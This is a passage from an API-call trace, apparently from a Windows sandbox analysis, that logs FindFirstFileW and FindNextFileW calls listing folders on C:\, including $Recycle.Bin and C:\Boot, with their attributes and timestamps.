ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xc4d44e3f, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0156.191] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1b83b055, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b83b055, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0156.192] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x387f5bb4, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0156.193] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0156.193] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x858b6c65, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x858b6c65, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x68042bf5, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0x0, dwReserved1=0x0, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0156.193] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x85289733, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x2dbfc137, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x2dbfc137, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0156.193] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0156.194] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0156.194] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0156.194] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.194] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.194] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.195] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0156.195] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-1560258661-3990802383-1811730007-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0156.195] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-1560258661-3990802383-1811730007-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0156.195] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.196] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.196] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.196] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0156.196] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-1560258661-3990802383-1811730007-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0156.197] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-1560258661-3990802383-1811730007-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0156.197] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.197] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.197] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.197] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0156.198] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0156.198] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.198] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.198] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.199] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0156.199] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.199] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.199] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.199] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.200] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0156.200] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0156.200] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.200] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.201] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.201] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0156.201] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.201] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.201] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.202] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.202] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xf555b9a2, ftLastAccessTime.dwHighDateTime=0x1d7e768, ftLastWriteTime.dwLowDateTime=0xf555b9a2, ftLastWriteTime.dwHighDateTime=0x1d7e768, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0156.202] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0156.202] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0156.202] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0156.203] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7898476d, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0156.203] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0156.203] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0156.203] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0156.203] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0156.204] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0156.204] FindNextFileW (in: 